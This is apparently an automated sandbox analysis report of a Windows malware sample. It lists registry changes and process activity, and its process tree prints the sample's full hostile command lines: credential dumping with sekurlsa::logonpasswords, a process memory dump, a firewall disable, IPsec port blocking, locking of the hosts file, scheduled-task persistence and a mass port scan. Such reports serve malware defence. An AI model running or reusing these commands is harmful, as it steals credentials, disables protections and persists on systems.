cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8e065bda3d6123b22bdd0e98724a1480N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bbqlvcqnq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1640 cmd.exe 4772 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x00080000000234c1-6.dat nsis_installer_2 behavioral2/files/0x00070000000234c9-15.dat nsis_installer_1 behavioral2/files/0x00070000000234c9-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 39 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing emzriir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ emzriir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" emzriir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" emzriir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" emzriir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" emzriir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" zhcbccpzr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zhcbccpzr.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" emzriir.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4772 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4628 schtasks.exe 2064 schtasks.exe 1096 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3044 8e065bda3d6123b22bdd0e98724a1480N.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 3044 8e065bda3d6123b22bdd0e98724a1480N.exe Token: SeDebugPrivilege 2376 emzriir.exe Token: SeDebugPrivilege 1076 emzriir.exe Token: SeDebugPrivilege 468 vfshost.exe Token: SeDebugPrivilege 4660 zhcbccpzr.exe Token: SeLockMemoryPrivilege 4644 bnidgq.exe Token: SeLockMemoryPrivilege 4644 bnidgq.exe Token: SeDebugPrivilege 856 zhcbccpzr.exe Token: SeDebugPrivilege 732 zhcbccpzr.exe Token: SeDebugPrivilege 1132 zhcbccpzr.exe Token: SeDebugPrivilege 2636 zhcbccpzr.exe Token: SeDebugPrivilege 696 zhcbccpzr.exe Token: SeDebugPrivilege 3692 zhcbccpzr.exe Token: SeDebugPrivilege 1788 zhcbccpzr.exe Token: SeDebugPrivilege 3444 zhcbccpzr.exe Token: SeDebugPrivilege 2680 zhcbccpzr.exe Token: SeDebugPrivilege 1436 zhcbccpzr.exe Token: SeDebugPrivilege 4684 zhcbccpzr.exe Token: SeDebugPrivilege 3384 zhcbccpzr.exe Token: SeDebugPrivilege 2536 zhcbccpzr.exe Token: SeDebugPrivilege 2396 zhcbccpzr.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 3044 8e065bda3d6123b22bdd0e98724a1480N.exe 3044 8e065bda3d6123b22bdd0e98724a1480N.exe 2376 emzriir.exe 2376 emzriir.exe 1076 emzriir.exe 1076 emzriir.exe 3592 xohudmc.exe 1064 xchlyg.exe 2916 emzriir.exe 2916 emzriir.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3044 wrote to memory of 1640 3044 8e065bda3d6123b22bdd0e98724a1480N.exe 85 PID 3044 wrote to memory of 1640 3044 8e065bda3d6123b22bdd0e98724a1480N.exe 85 PID 3044 wrote to memory of 1640 3044 8e065bda3d6123b22bdd0e98724a1480N.exe 85 PID 1640 wrote to memory of 4772 1640 cmd.exe 87 PID 1640 wrote to memory of 4772 1640 cmd.exe 87 PID 1640 wrote to memory of 4772 1640 cmd.exe 87 PID 1640 wrote to memory of 2376 1640 cmd.exe 89 PID 1640 wrote to memory of 2376 1640 cmd.exe 89 PID 1640 wrote to memory of 2376 1640 cmd.exe 89 PID 1076 wrote to memory of 2092 1076 emzriir.exe 91 PID 1076 wrote to memory of 2092 1076 emzriir.exe 91 PID 1076 wrote to memory of 2092 1076 emzriir.exe 91 PID 2092 wrote to memory of 4676 2092 cmd.exe 93 PID 2092 wrote to memory of 4676 2092 cmd.exe 93 PID 2092 wrote to memory of 4676 2092 cmd.exe 93 PID 2092 wrote to memory of 804 2092 cmd.exe 94 PID 2092 wrote to memory of 804 2092 cmd.exe 94 PID 2092 wrote to memory of 804 2092 cmd.exe 94 PID 2092 wrote to memory of 4956 2092 cmd.exe 95 PID 2092 wrote to memory of 4956 2092 cmd.exe 95 PID 2092 wrote to memory of 4956 2092 cmd.exe 95 PID 2092 wrote to memory of 3360 2092 cmd.exe 96 PID 2092 wrote to memory of 3360 2092 cmd.exe 96 PID 2092 wrote to memory of 3360 2092 cmd.exe 96 PID 1076 wrote to memory of 5072 1076 emzriir.exe 97 PID 1076 wrote to memory of 5072 1076 emzriir.exe 97 PID 1076 wrote to memory of 5072 1076 emzriir.exe 97 PID 2092 wrote to memory of 3292 2092 cmd.exe 99 PID 2092 wrote to memory of 3292 2092 cmd.exe 99 PID 2092 wrote to memory of 3292 2092 cmd.exe 99 PID 2092 wrote to memory of 1568 2092 cmd.exe 100 PID 2092 wrote to memory of 1568 2092 cmd.exe 100 PID 2092 wrote to memory of 1568 2092 cmd.exe 100 PID 1076 wrote to memory of 2380 1076 emzriir.exe 101 PID 1076 wrote to memory of 2380 1076 emzriir.exe 101 PID 1076 wrote to memory of 2380 1076 emzriir.exe 101 PID 1076 wrote to memory of 4652 1076 emzriir.exe 103 PID 1076 wrote to memory of 4652 1076 emzriir.exe 103 PID 1076 wrote to memory of 4652 1076 emzriir.exe 103 PID 1076 wrote to memory of 684 1076 emzriir.exe 105 PID 1076 wrote to memory of 684 1076 emzriir.exe 105 PID 1076 wrote to memory of 684 1076 emzriir.exe 105 PID 684 wrote to memory of 2504 684 cmd.exe 107 PID 684 wrote to memory of 2504 684 cmd.exe 107 PID 684 wrote to memory of 2504 684 cmd.exe 107 PID 2504 wrote to memory of 4680 2504 wpcap.exe 108 PID 2504 wrote to memory of 4680 2504 wpcap.exe 108 PID 2504 wrote to memory of 4680 2504 wpcap.exe 108 PID 4680 wrote to memory of 1644 4680 net.exe 110 PID 4680 wrote to memory of 1644 4680 net.exe 110 PID 4680 wrote to memory of 1644 4680 net.exe 110 PID 2504 wrote to memory of 2600 2504 wpcap.exe 111 PID 2504 wrote to memory of 2600 2504 wpcap.exe 111 PID 2504 wrote to memory of 2600 2504 wpcap.exe 111 PID 2600 wrote to memory of 4736 2600 net.exe 113 PID 2600 wrote to memory of 4736 2600 net.exe 113 PID 2600 wrote to memory of 4736 2600 net.exe 113 PID 2504 wrote to memory of 4296 2504 wpcap.exe 114 PID 2504 wrote to memory of 4296 2504 wpcap.exe 114 PID 2504 wrote to memory of 4296 2504 wpcap.exe 114 PID 4296 wrote to memory of 4592 4296 net.exe 116 PID 4296 wrote to memory of 4592 4296 net.exe 116 PID 4296 wrote to memory of 4592 4296 net.exe 116 PID 2504 wrote to memory of 1036 2504 wpcap.exe 117
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2172
-
C:\Windows\TEMP\qzebsiybv\bnidgq.exe"C:\Windows\TEMP\qzebsiybv\bnidgq.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4644
-
-
C:\Users\Admin\AppData\Local\Temp\8e065bda3d6123b22bdd0e98724a1480N.exe"C:\Users\Admin\AppData\Local\Temp\8e065bda3d6123b22bdd0e98724a1480N.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\znrgncrv\emzriir.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4772
-
-
C:\Windows\znrgncrv\emzriir.exeC:\Windows\znrgncrv\emzriir.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2376
-
-
-
C:\Windows\znrgncrv\emzriir.exeC:\Windows\znrgncrv\emzriir.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4676
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4956
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:3360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3292
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:1568
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5072
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2380
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4652
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exeC:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1644
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4736
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4592
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:1036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2336
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4008
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:5076 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3692
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1616 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2308
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:5040
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kgkufnrnc\uhbggiaeb\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:3620 -
C:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exeC:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kgkufnrnc\uhbggiaeb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kgkufnrnc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\kgkufnrnc\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:824 -
C:\Windows\kgkufnrnc\Corporate\vfshost.exeC:\Windows\kgkufnrnc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bfgicktqy" /ru system /tr "cmd /c C:\Windows\ime\emzriir.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2948 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4848
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bfgicktqy" /ru system /tr "cmd /c C:\Windows\ime\emzriir.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "knzrvbgag" /ru system /tr "cmd /c echo Y|cacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F"2⤵PID:5052
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "knzrvbgag" /ru system /tr "cmd /c echo Y|cacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "vcpfgnbum" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:4784 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2372
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "vcpfgnbum" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4628
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2384
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2428
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3260
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:920
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4212
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1928
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3784
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4680
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1380
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1508
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:696
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2312
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
PID:4672 -
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
PID:3968 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
PID:3692
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
PID:4564 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4176
-
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 768 C:\Windows\TEMP\kgkufnrnc\768.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
